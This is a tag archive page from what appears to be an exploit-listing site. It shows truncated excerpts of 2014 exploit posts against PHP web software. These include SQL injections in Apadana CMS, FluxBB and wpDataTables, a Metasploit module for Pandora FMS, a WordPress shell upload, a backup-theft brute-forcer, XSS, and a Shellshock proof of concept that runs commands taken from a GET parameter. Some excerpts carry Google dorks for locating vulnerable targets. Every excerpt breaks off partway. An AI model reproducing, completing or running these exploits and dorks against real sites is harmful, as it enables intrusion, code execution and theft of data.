Tags archives: php

 

0

Apadana CMS SQL Injection

[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] Exploit Title : Apadana CMS Sql Injection Vulnerability [0] Exploit Author : SeRaVo.BlackHat [0] Vendor Homepage : http://www.apadanacms.ir/ [0] Google Dork : powered by apadana CMS [0] Date: 2014/November/25 [0] Tested On : windows + linux | Mozila | Havij [0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/ [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: [0] ::: [...]

 

0

Pandora FMS SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => ‘Pandora FMS SQLi Remote Code Execution’, ‘Description’ => %q{ This module attempts to exploit multiple issues in order to gain remote [...]

 

0

WordPress Html5 Mp3 Player Full Path Disclosure

WordPress – (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ _______ ____ | | [...]

 

0

WordPress Sexy Squeeze Pages Cross Site Scripting

WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ _______ ____ | | / | [...]

 

0

FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python # Friday, November 21, 2014 – secthrowaway@safe-mail.net # FluxBB <= 1.5.6 SQL Injection # make sure that your IP is reachable   url = ‘http://target.tld/forum/’ user = ‘user’ # dummy account pwd = ‘test’   import urllib, sys, smtpd, asyncore, re, sha from email import message_from_string from urllib2 import Request, urlopen   ua [...]

 

0

WordPress wpDataTables 1.5.3 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability # # Vulnerability discovered by Claudio Viviani # # Date : 2014-11-22 # # Exploit written by Claudio Viviani # # Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc # # ——————————————————————– # # Issue n.1 (wpdatatables.php) # # This function is always available without wpdatatables [...]

 

0

WordPress wpDataTables 1.5.3 SQL Injection

###################### # Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium) # Date : 2014-11-22 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ######################   # Description [...]

 

0

WordPress WP-DB-Backup 2.2.4 Backup Theft

#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite   DATE=”20141031″; #Date to search   if [ ! -e rainbow ]; then [...]

 

0

PHP 5.x / Bash Shellshock Proof Of Concept

<?php   // Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit // Date: 22/11/2014 // Exploit Author: ssbostan // Vendor Homepage: http://www.gnu.org/software/bash/ // Software Link: http://ftp.gnu.org/gnu/bash/ // Version: <= 4.3 // Tested on: Fedora 17, Ubuntu 8.04 // CVE: http://www.cvedetails.com/cve/CVE-2014-6271/   if(isset($_GET["cmd"]) && !empty($_GET["cmd"])) { $file=tempnam(“/tmp”, “xpl”); putenv(“PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}”); mail(“xpl@localhost”, [...]

 

0

WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin CVE: CVE-2014-8877 Plugin: CM Download Manager plugin Vendor: CreativeMinds – https://www.cminds.com/ Product: https://wordpress.org/plugins/cm-download-manager/ Affected version: 2.0.0 and previous version Fixed version: 2.0.4 Google dork: inurl:cmdownloads Reported by: Phi Le Ngoc – phi.n.le@itas.vn Credits to ITAS Team – www.itas.vn     ::DESCRITION::   The code injection [...]